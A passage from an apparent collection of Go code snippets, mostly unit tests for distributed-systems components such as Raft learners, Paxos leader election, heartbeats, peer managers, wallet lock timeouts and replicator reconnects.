waitTime)\n\t\t<-timeDelay\n\t}\n\tseq2 <- true\n}", "func TestUnreachableMarks(t *testing.T) {\n\tseeds := []string {\"127.0.0.1:6000\",}\n\tmanager1 := CreatePeerManager(6000, 6001, nil, FullMode)\n\tmanager2 := CreatePeerManager(7000, 7001, seeds, FullMode)\n\tmanager3 := CreatePeerManager(8000, 8001, seeds, FullMode)\n\n\t// Change update period to lengthen the time between marking a peer unreachable \n\t// and the next status update\n\tmanager1.StatusUpdatePeriod=500*time.Millisecond\n\tmanager2.StatusUpdatePeriod=500*time.Millisecond\n\tmanager3.StatusUpdatePeriod=500*time.Millisecond\n\n\tmarkPeer := func(t *testing.T) {\n\t\tmanager1.MarkPeerUnreachable(\"127.0.0.1:8001\")\n\t\tmanager1.MarkPeerUnreachable(\"127.0.0.1:8001\")\n\t\tmanager1.MarkPeerUnreachable(\"127.0.0.1:8001\")\n\t\tavailable := GetPeerManagerAvailablePeers(manager1)\n\t\texpected := []string {\"127.0.0.1:6001\", \"127.0.0.1:7001\"}\n\t\tif !MapOnlyContains(available, expected) {\n\t\t\tt.Errorf(\"Peer 127.0.0.1:8001 wasn't marked unreachable %v\\n\", available)\n\t\t}\n\t}\n\n\t// After some time has passed all the peers should be available again\n\tallPeers := []string {\"127.0.0.1:6001\", \"127.0.0.1:7001\", \"127.0.0.1:8001\"}\n\tPeerManagerPropagationHelper(t, manager1, manager2, manager3,\n\t\tallPeers, allPeers, allPeers, markPeer, 3200*time.Millisecond, 8*time.Second)\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func generateElectionTime() int {\n rand.Seed(time.Now().UnixNano())\n return rand.Intn(150)*2 + 300\n}", "func TestLearnerLogReplication(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tnt := newNetwork(n1, n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t// n1 is leader and n2 is learner\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif !n2.isLearner {\n\t\tt.Error(\"peer 2 state: not learner, want yes\")\n\t}\n\n\tnextCommitted := n1.raftLog.committed + 1\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"somedata\")}}})\n\tif n1.raftLog.committed != nextCommitted {\n\t\tt.Errorf(\"peer 1 wants committed to %d, but still %d\", nextCommitted, n1.raftLog.committed)\n\t}\n\n\tif n1.raftLog.committed != n2.raftLog.committed {\n\t\tt.Errorf(\"peer 2 wants committed to %d, but still %d\", n1.raftLog.committed, n2.raftLog.committed)\n\t}\n\n\tmatch := n1.getProgress(2).Match\n\tif match != n2.raftLog.committed {\n\t\tt.Errorf(\"progress 2 of leader 1 wants match %d, but got %d\", n2.raftLog.committed, match)\n\t}\n}", "func TestClusterNodeVacation(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"skipping cluster test in short mode.\")\n\t}\n\tt.Parallel()\n\n\ttc := newTestCluster(t)\n\tdefer tc.tearDown()\n\n\ttc.addSequinses(3)\n\ttc.makeVersionAvailable(v2)\n\ttc.sequinses[0].expectProgression(down, noVersion, v2, down, v3)\n\ttc.sequinses[1].expectProgression(down, noVersion, v2, v3)\n\ttc.sequinses[2].expectProgression(down, noVersion, v2, v3)\n\n\ttc.setup()\n\ttc.startTest()\n\ttime.Sleep(expectTimeout)\n\n\ttc.sequinses[0].stop()\n\ttime.Sleep(expectTimeout)\n\n\ttc.makeVersionAvailable(v3)\n\ttc.sequinses[1].hup()\n\ttc.sequinses[2].hup()\n\ttime.Sleep(expectTimeout)\n\n\ttc.sequinses[0].start()\n\ttc.assertProgression()\n}", "func TestElectVotersNonDupDeterministic(t *testing.T) {\n\tcandidates1 := newValidatorSet(100, func(i int) int64 { return int64(i + 1) })\n\tcandidates2 := newValidatorSet(100, func(i int) int64 { return int64(i + 1) })\n\tfor i := 1; i <= 100; i++ {\n\t\twinners1 := electVotersNonDup(candidates1.Validators, uint64(i), 24, 0)\n\t\twinners2 := electVotersNonDup(candidates2.Validators, uint64(i), 24, 0)\n\t\tsameVoters(winners1, winners2)\n\t\tresetPoints(candidates1)\n\t\tresetPoints(candidates2)\n\t}\n}", "func TestDefaultClientOptions(t *testing.T) {\n\tt.Parallel()\n\n\toptions := DefaultClientOptions()\n\n\tif options.UserAgent != defaultUserAgent {\n\t\tt.Fatalf(\"expected value: %s got: %s\", defaultUserAgent, options.UserAgent)\n\t}\n\n\tif options.BackOffExponentFactor != 2.0 {\n\t\tt.Fatalf(\"expected value: %f got: %f\", 2.0, options.BackOffExponentFactor)\n\t}\n\n\tif options.BackOffInitialTimeout != 2*time.Millisecond {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 2*time.Millisecond, options.BackOffInitialTimeout)\n\t}\n\n\tif options.BackOffMaximumJitterInterval != 2*time.Millisecond {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 2*time.Millisecond, options.BackOffMaximumJitterInterval)\n\t}\n\n\tif options.BackOffMaxTimeout != 10*time.Millisecond {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 10*time.Millisecond, options.BackOffMaxTimeout)\n\t}\n\n\tif options.DialerKeepAlive != 20*time.Second {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 20*time.Second, options.DialerKeepAlive)\n\t}\n\n\tif options.DialerTimeout != 5*time.Second {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 5*time.Second, options.DialerTimeout)\n\t}\n\n\tif options.RequestRetryCount != 2 {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 2, options.RequestRetryCount)\n\t}\n\n\tif options.RequestTimeout != 10*time.Second {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 10*time.Second, options.RequestTimeout)\n\t}\n\n\tif options.TransportExpectContinueTimeout != 3*time.Second {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 3*time.Second, options.TransportExpectContinueTimeout)\n\t}\n\n\tif options.TransportIdleTimeout != 20*time.Second {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 20*time.Second, options.TransportIdleTimeout)\n\t}\n\n\tif options.TransportMaxIdleConnections != 10 {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 10, options.TransportMaxIdleConnections)\n\t}\n\n\tif options.TransportTLSHandshakeTimeout != 5*time.Second {\n\t\tt.Fatalf(\"expected value: %v got: %v\", 5*time.Second, options.TransportTLSHandshakeTimeout)\n\t}\n}", "func (p *MockProvisionerClient) Timeout() time.Duration {\n\treturn 30 * time.Second\n}", "func TestLeaderElectionReceiveMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// Replayed ViewChange message should be ignored. Idempotent.\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from self should be ignored.\n\tvc = &pb.ViewChange{NodeId: 1, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for past view should be ignored.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 0}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from node 2 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n\tif exp, a := uint64(1), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n\n\t// The rest of the ViewChange messages should be ignored.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tvc = &pb.ViewChange{NodeId: 4, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n}", "func TestClientHeartbeatBadServer(t *testing.T) {\n\ttlsConfig, err := LoadTestTLSConfig(\"..\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\taddr := util.CreateTestAddr(\"tcp\")\n\t// Create a server which doesn't support heartbeats.\n\ts := &Server{\n\t\tServer: rpc.NewServer(),\n\t\ttlsConfig: tlsConfig,\n\t\taddr: addr,\n\t\tcloseCallbacks: make([]func(conn net.Conn), 0, 1),\n\t}\n\tif err := s.Start(); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Now, create a client. It should attempt a heartbeat and fail,\n\t// causing retry loop to activate.\n\tc := NewClient(s.Addr(), nil, tlsConfig)\n\tselect {\n\tcase <-c.Ready:\n\t\tt.Error(\"unexpected client heartbeat success\")\n\tcase <-c.Closed:\n\t}\n\ts.Close()\n}", "func TestHeartbeatKeepAlive(t *testing.T) {\n\tt.Parallel()\n\n\ttests := []struct {\n\t\tname string\n\t\tmode HeartbeatMode\n\t\tmakeServer func() types.Resource\n\t}{\n\t\t{\n\t\t\tname: \"keep alive node\",\n\t\t\tmode: HeartbeatModeNode,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.ServerV2{\n\t\t\t\t\tKind: types.KindNode,\n\t\t\t\t\tVersion: types.V2,\n\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.ServerSpecV2{\n\t\t\t\t\t\tAddr: \"127.0.0.1:1234\",\n\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"keep alive app server\",\n\t\t\tmode: HeartbeatModeApp,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.AppServerV3{\n\t\t\t\t\tKind: types.KindAppServer,\n\t\t\t\t\tVersion: types.V3,\n\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.AppServerSpecV3{\n\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"keep alive database server\",\n\t\t\tmode: HeartbeatModeDB,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.DatabaseServerV3{\n\t\t\t\t\tKind: types.KindDatabaseServer,\n\t\t\t\t\tVersion: types.V3,\n\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\tName: \"db-1\",\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.DatabaseServerSpecV3{\n\t\t\t\t\t\tDatabase: mustCreateDatabase(t, \"db-1\", defaults.ProtocolPostgres, \"127.0.0.1:1234\"),\n\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"keep alive database service\",\n\t\t\tmode: HeartbeatModeDatabaseService,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.DatabaseServiceV1{\n\t\t\t\t\tResourceHeader: types.ResourceHeader{\n\t\t\t\t\t\tKind: types.KindDatabaseService,\n\t\t\t\t\t\tVersion: types.V1,\n\t\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.DatabaseServiceSpecV1{\n\t\t\t\t\t\tResourceMatchers: []*types.DatabaseResourceMatcher{\n\t\t\t\t\t\t\t{Labels: &types.Labels{\"env\": []string{\"prod\", \"qa\"}}},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t}\n\tfor _, tt := range tests {\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tctx, cancel := context.WithCancel(context.Background())\n\t\t\tdefer cancel()\n\t\t\tclock := clockwork.NewFakeClock()\n\t\t\tannouncer := newFakeAnnouncer(ctx)\n\n\t\t\tserver := tt.makeServer()\n\n\t\t\thb, err := NewHeartbeat(HeartbeatConfig{\n\t\t\t\tContext: ctx,\n\t\t\t\tMode: tt.mode,\n\t\t\t\tComponent: \"test\",\n\t\t\t\tAnnouncer: announcer,\n\t\t\t\tCheckPeriod: time.Second,\n\t\t\t\tAnnouncePeriod: 60 * time.Second,\n\t\t\t\tKeepAlivePeriod: 10 * time.Second,\n\t\t\t\tServerTTL: 600 * time.Second,\n\t\t\t\tClock: clock,\n\t\t\t\tGetServerInfo: func() (types.Resource, error) {\n\t\t\t\t\tserver.SetExpiry(clock.Now().UTC().Add(apidefaults.ServerAnnounceTTL))\n\t\t\t\t\treturn server, nil\n\t\t\t\t},\n\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateInit, hb.state)\n\n\t\t\t// on the first run, heartbeat will move to announce state,\n\t\t\t// will call announce right away\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateAnnounce, hb.state)\n\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, 1, announcer.upsertCalls[hb.Mode])\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, clock.Now().UTC().Add(hb.KeepAlivePeriod), hb.nextKeepAlive)\n\n\t\t\t// next call will not move to announce, because time is not up yet\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\n\t\t\t// advance time, and heartbeat will move to keep alive\n\t\t\tclock.Advance(hb.KeepAlivePeriod + time.Second)\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAlive, hb.state)\n\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Len(t, announcer.keepAlivesC, 1)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, clock.Now().UTC().Add(hb.KeepAlivePeriod), hb.nextKeepAlive)\n\n\t\t\t// update server info, system should switch to announce state\n\t\t\tserver = tt.makeServer()\n\t\t\tserver.SetName(\"2\")\n\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateAnnounce, hb.state)\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, clock.Now().UTC().Add(hb.KeepAlivePeriod), hb.nextKeepAlive)\n\n\t\t\t// in case of any error while sending keep alive, system should fail\n\t\t\t// and go back to init state\n\t\t\tannouncer.keepAlivesC = make(chan types.KeepAlive)\n\t\t\tannouncer.err = trace.ConnectionProblem(nil, \"ooops\")\n\t\t\tannouncer.Close()\n\t\t\tclock.Advance(hb.KeepAlivePeriod + time.Second)\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAlive, hb.state)\n\t\t\terr = hb.announce()\n\t\t\trequire.Error(t, err)\n\t\t\trequire.IsType(t, announcer.err, err)\n\t\t\trequire.Equal(t, HeartbeatStateInit, hb.state)\n\t\t\trequire.Equal(t, 2, announcer.upsertCalls[hb.Mode])\n\n\t\t\t// on the next run, system will try to reannounce\n\t\t\tannouncer.err = nil\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateAnnounce, hb.state)\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, 3, announcer.upsertCalls[hb.Mode])\n\t\t})\n\t}\n}", "func TestSkipNoMember(t *testing.T) {\n\tcommitteeMock, keys := agreement.MockCommittee(1, false, 2)\n\teb, roundChan := initAgreement(committeeMock)\n\thash, _ := crypto.RandEntropy(32)\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\n\tselect {\n\tcase <-roundChan:\n\t\tassert.FailNow(t, \"not supposed to get a round update without reaching quorum\")\n\tcase <-time.After(100 * time.Millisecond):\n\t\t// all good\n\t}\n}", "func (fd *failureDetector) timeout() {\n\tfd.logln(\"timeout\")\n\tfd.m.Lock()\n\tdefer fd.m.Unlock()\n\tif !fd.aliveSuspectedIntersectionEmpty() {\n\t\tfd.delay = fd.delay + fd.delta\n\t\tfd.logf(\"new delay %d\\n\", fd.delay)\n\t\tfd.timeoutSignal = time.NewTicker(fd.delay)\n\t}\n\tfor _, node := range fd.config.Nodes() {\n\t\tif !fd.alive[node] && !fd.suspected[node] {\n\t\t\tfd.suspected[node] = true\n\t\t\tfd.logf(\"suspect %v\\n\", node)\n\t\t\tfd.sr.Suspect(node)\n\t\t} else if fd.alive[node] && fd.suspected[node] {\n\t\t\tdelete(fd.suspected, node)\n\t\t\tfd.logf(\"restore %v\\n\", node)\n\t\t\tfd.sr.Restore(node)\n\t\t}\n\n\t\tfd.hbChan <- node\n\t}\n\tfd.logln(\"fd.alive\", fd.alive)\n\tfd.alive = make(map[*Node]bool)\n}", "func testNonNilTimeoutLock(ctx context.Context, t *testing.T, w *Wallet) {\n\ttimeChan := make(chan time.Time)\n\terr := w.Unlock(ctx, testPrivPass, timeChan)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet\")\n\t}\n\ttimeChan <- time.Time{}\n\ttime.Sleep(100 * time.Millisecond) // Allow time for lock in background\n\tif !w.Locked() {\n\t\tt.Fatal(\"wallet should have locked after timeout\")\n\t}\n}", "func TestExecuteRunnerStatusNoNet(t *testing.T) {\n\tbuf := setLogBuffer()\n\tdefer func() {\n\t\tif t.Failed() {\n\t\t\tt.Log(buf.String())\n\t\t}\n\t}()\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer cancel()\n\n\tvar zoo myCall\n\n\tpool, err := NewSystemTestNodePoolNoNet()\n\tif err != nil {\n\t\tt.Fatalf(\"Creating Node Pool failed %v\", err)\n\t}\n\n\trunners, err := pool.Runners(context.Background(), &zoo)\n\tif err != nil {\n\t\tt.Fatalf(\"Getting Runners from Pool failed %v\", err)\n\t}\n\tif len(runners) == 0 {\n\t\tt.Fatalf(\"Getting Runners from Pool failed no-runners\")\n\t}\n\n\tfor _, dest := range runners {\n\t\tstatus, err := dest.Status(ctx)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Runners Status failed for %v err=%v\", dest.Address(), err)\n\t\t}\n\t\tif status == nil || status.StatusFailed {\n\t\t\tt.Fatalf(\"Runners Status not OK for %v %v\", dest.Address(), status)\n\t\t}\n\t\tif !status.IsNetworkDisabled {\n\t\t\tt.Fatalf(\"Runners Status should have NO network enabled %v %v\", dest.Address(), status)\n\t\t}\n\t\tt.Logf(\"Runner %v got Status=%+v\", dest.Address(), status)\n\t}\n\n\tf, err := os.Create(StatusBarrierFile)\n\tif err != nil {\n\t\tt.Fatalf(\"create file=%v failed err=%v\", StatusBarrierFile, err)\n\t}\n\tf.Close()\n\n\t// Let status hc caches expire.\n\tselect {\n\tcase <-time.After(time.Duration(2 * time.Second)):\n\tcase <-ctx.Done():\n\t\tt.Fatal(\"Timeout\")\n\t}\n\n\tfor _, dest := range runners {\n\t\tstatus, err := dest.Status(ctx)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Runners Status failed for %v err=%v\", dest.Address(), err)\n\t\t}\n\t\tif status == nil || status.StatusFailed {\n\t\t\tt.Fatalf(\"Runners Status not OK for %v %v\", dest.Address(), status)\n\t\t}\n\t\tif status.IsNetworkDisabled {\n\t\t\tt.Fatalf(\"Runners Status should have network enabled %v %v\", dest.Address(), status)\n\t\t}\n\t\tt.Logf(\"Runner %v got Status=%+v\", dest.Address(), status)\n\t}\n\n}", "func verifyConvergence(numNodes, maxCycles int, interval time.Duration, t *testing.T) {\n\tnetwork := simulation.NewNetwork(numNodes, \"tcp\", interval)\n\n\tif connectedCycle := network.RunUntilFullyConnected(); connectedCycle > maxCycles {\n\t\tt.Errorf(\"expected a fully-connected network within %d cycles; took %d\",\n\t\t\tmaxCycles, connectedCycle)\n\t}\n\tnetwork.Stop()\n}", "func testNoNilTimeoutReplacement(ctx context.Context, t *testing.T, w *Wallet) {\n\terr := w.Unlock(ctx, testPrivPass, nil)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet\")\n\t}\n\ttimeChan := make(chan time.Time)\n\terr = w.Unlock(ctx, testPrivPass, timeChan)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet with time channel\")\n\t}\n\tselect {\n\tcase timeChan <- time.Time{}:\n\tcase <-time.After(100 * time.Millisecond):\n\t\tt.Fatal(\"time channel was not read in 100ms\")\n\t}\n\tif w.Locked() {\n\t\tt.Fatal(\"expected wallet to remain unlocked due to previous unlock without timeout\")\n\t}\n}", "func TestLearnerCannotVote(t *testing.T) {\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n2)\n\n\tn2.becomeFollower(1, None)\n\n\tn2.Step(pb.Message{From: 1, To: 2, Term: 2, Type: pb.MsgVote, LogTerm: 11, Index: 11})\n\n\tif len(n2.msgs) != 0 {\n\t\tt.Errorf(\"expect learner not to vote, but received %v messages\", n2.msgs)\n\t}\n}", "func TestActiveReplicatorReconnectOnStart(t *testing.T) {\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tif testing.Short() {\n\t\tt.Skipf(\"Test skipped in short mode\")\n\t}\n\n\ttests := []struct {\n\t\tname string\n\t\tusernameOverride string\n\t\tremoteURLHostOverride string\n\t\texpectedErrorContains string\n\t\texpectedErrorIsConnectionRefused bool\n\t}{\n\t\t{\n\t\t\tname: \"wrong user\",\n\t\t\tusernameOverride: \"bob\",\n\t\t\texpectedErrorContains: \"unexpected status code 401 from target database\",\n\t\t},\n\t\t{\n\t\t\tname: \"invalid port\", // fails faster than unroutable address (connection refused vs. connect timeout)\n\t\t\tremoteURLHostOverride: \"127.0.0.1:1234\",\n\t\t\texpectedErrorIsConnectionRefused: true,\n\t\t},\n\t}\n\tfor _, test := range tests {\n\t\tt.Run(test.name, func(t *testing.T) {\n\n\t\t\tvar abortTimeout = time.Millisecond * 500\n\t\t\tif runtime.GOOS == \"windows\" {\n\t\t\t\t// A longer timeout is required on Windows as connection refused errors take approx 2 seconds vs. instantaneous on Linux.\n\t\t\t\tabortTimeout = time.Second * 5\n\t\t\t}\n\t\t\t// test cases with and without a timeout. Ensure replicator retry loop is stopped in both cases.\n\t\t\ttimeoutVals := []time.Duration{\n\t\t\t\t0,\n\t\t\t\tabortTimeout,\n\t\t\t}\n\n\t\t\tfor _, timeoutVal := range timeoutVals {\n\t\t\t\tt.Run(test.name+\" with timeout \"+timeoutVal.String(), func(t *testing.T) {\n\n\t\t\t\t\tbase.SetUpTestLogging(t, logger.LevelDebug, logger.KeyAll)\n\n\t\t\t\t\t// Passive\n\t\t\t\t\ttb2 := base.GetTestBucket(t)\n\t\t\t\t\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\t\t\t\t\tTestBucket: tb2,\n\t\t\t\t\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\t\t\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\t\t\t\t\"alice\": {\n\t\t\t\t\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t}},\n\t\t\t\t\t})\n\t\t\t\t\tdefer rt2.Close()\n\n\t\t\t\t\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\t\t\t\t\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\t\t\t\t\tdefer srv.Close()\n\n\t\t\t\t\t// Build remoteDBURL with basic auth creds\n\t\t\t\t\tremoteDBURL, err := url.Parse(srv.URL + \"/db\")\n\t\t\t\t\trequire.NoError(t, err)\n\n\t\t\t\t\t// Add basic auth creds to target db URL\n\t\t\t\t\tusername := \"alice\"\n\t\t\t\t\tif test.usernameOverride != \"\" {\n\t\t\t\t\t\tusername = test.usernameOverride\n\t\t\t\t\t}\n\t\t\t\t\tremoteDBURL.User = url.UserPassword(username, \"pass\")\n\n\t\t\t\t\tif test.remoteURLHostOverride != \"\" {\n\t\t\t\t\t\tremoteDBURL.Host = test.remoteURLHostOverride\n\t\t\t\t\t}\n\n\t\t\t\t\t// Active\n\t\t\t\t\ttb1 := base.GetTestBucket(t)\n\t\t\t\t\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\t\t\t\t\tTestBucket: tb1,\n\t\t\t\t\t})\n\t\t\t\t\tdefer rt1.Close()\n\n\t\t\t\t\tid, err := base.GenerateRandomID()\n\t\t\t\t\trequire.NoError(t, err)\n\t\t\t\t\tarConfig := db.ActiveReplicatorConfig{\n\t\t\t\t\t\tID: id,\n\t\t\t\t\t\tDirection: db.ActiveReplicatorTypePush,\n\t\t\t\t\t\tRemoteDBURL: remoteDBURL,\n\t\t\t\t\t\tActiveDB: &db.Database{\n\t\t\t\t\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t\t\t\t\t},\n\t\t\t\t\t\tContinuous: true,\n\t\t\t\t\t\t// aggressive reconnect intervals for testing purposes\n\t\t\t\t\t\tInitialReconnectInterval: time.Millisecond,\n\t\t\t\t\t\tMaxReconnectInterval: time.Millisecond * 50,\n\t\t\t\t\t\tTotalReconnectTimeout: timeoutVal,\n\t\t\t\t\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t\t\t\t\t}\n\n\t\t\t\t\t// Create the first active replicator to pull from seq:0\n\t\t\t\t\tar := db.NewActiveReplicator(&arConfig)\n\t\t\t\t\trequire.NoError(t, err)\n\n\t\t\t\t\tassert.Equal(t, int64(0), ar.Push.GetStats().NumConnectAttempts.Value())\n\n\t\t\t\t\terr = ar.Start()\n\t\t\t\t\tassert.Error(t, err, \"expecting ar.Start() to return error, but it didn't\")\n\n\t\t\t\t\tif test.expectedErrorIsConnectionRefused {\n\t\t\t\t\t\tassert.True(t, base.IsConnectionRefusedError(err))\n\t\t\t\t\t}\n\n\t\t\t\t\tif test.expectedErrorContains != \"\" {\n\t\t\t\t\t\tassert.True(t, strings.Contains(err.Error(), test.expectedErrorContains))\n\t\t\t\t\t}\n\n\t\t\t\t\t// wait for an arbitrary number of reconnect attempts\n\t\t\t\t\twaitAndRequireCondition(t, func() bool {\n\t\t\t\t\t\treturn ar.Push.GetStats().NumConnectAttempts.Value() > 2\n\t\t\t\t\t}, \"Expecting NumConnectAttempts > 2\")\n\n\t\t\t\t\tif timeoutVal > 0 {\n\t\t\t\t\t\ttime.Sleep(timeoutVal + time.Millisecond*250)\n\t\t\t\t\t\t// wait for the retry loop to hit the TotalReconnectTimeout and give up retrying\n\t\t\t\t\t\twaitAndRequireCondition(t, func() bool {\n\t\t\t\t\t\t\treturn ar.Push.GetStats().NumReconnectsAborted.Value() > 0\n\t\t\t\t\t\t}, 